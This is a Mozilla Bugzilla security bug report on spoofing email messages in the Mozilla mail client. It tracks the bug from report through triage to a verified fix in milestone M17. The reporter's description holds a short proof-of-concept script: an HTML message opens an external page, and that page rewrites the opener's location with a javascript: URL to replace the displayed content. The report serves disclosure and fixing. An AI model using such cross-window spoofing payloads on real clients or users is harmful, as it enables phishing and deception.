Spoofing email messages

VERIFIED FIXED in M17

Status

()

P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: security-bugs)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [nsbeta2+], URL)

Attachments

(1 attachment)

(Reporter)

Description

19 years ago
It is possible to spoof email messages by manipulating the location object of
the currently displayed message. This is done by opening a window which does:
opener.location='javascript:s="<H1>Spoofed</H1>"'
The code that must be included in HTML message is:
-------------------------------------------
<SCRIPT>
a=window.open("ht"+"tp://www.nat.bg/~joro/mozilla/openlocation.html");
</SCRIPT>
-------------------------------------------

-----"http://www.nat.bg/~joro/mozilla/openlocation.html"------
<SCRIPT>
setTimeout("opener.location='javascript:s=\"<H1>Spoofed</H1>\"'; ",6000);
// It would be better to use setInterval(), but Mozilla crashes on my box in
this case
</SCRIPT>
--------------------------------------------------------------

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General

Updated

19 years ago
Keywords: beta2

Comment 2

19 years ago
Branch time for M15 has come... and so I'm moving this to M16 (Norris is out 
this week).
Target Milestone: M15 → M16

Updated

19 years ago
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
THis looks directly related to 37907. The fix is probably the same. I will
verify that the sameOrigin check is being done.
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED

Comment 5

19 years ago
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]

Comment 6

19 years ago
Changed QA contact to Cathy.
QA Contact: junruh → czhang
Created attachment 9041 [details] [diff] [review]
Proposed Patch - Needs Review
argh...disregard that patch...posted to the wrong bug.

Comment 9

19 years ago
it is not fixed yet. 
http://cathyz/bugs/23516.html
this page opens a window in another domain http://cathyz2/bugs/1.html, 
23516.html is spoofed by script in 1.html, same origin is not checked here I 
guess
Status: ASSIGNED → NEW
Moving to M17. Not an M16 stopper.
Target Milestone: M16 → M17

Comment 11

19 years ago
Assigning QA to czhang
Marking Confidential as per jar. jtaylor is attempting to reproduce this bug.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
I think this one is also dependent on 28443. jtaylor, can you confirm that this
one is fixed as of 7/6?
Depends on: 28443

Comment 14

19 years ago
Looks fixed with 2000070608 build.
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Comment 16

19 years ago
verified, no spoofing
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.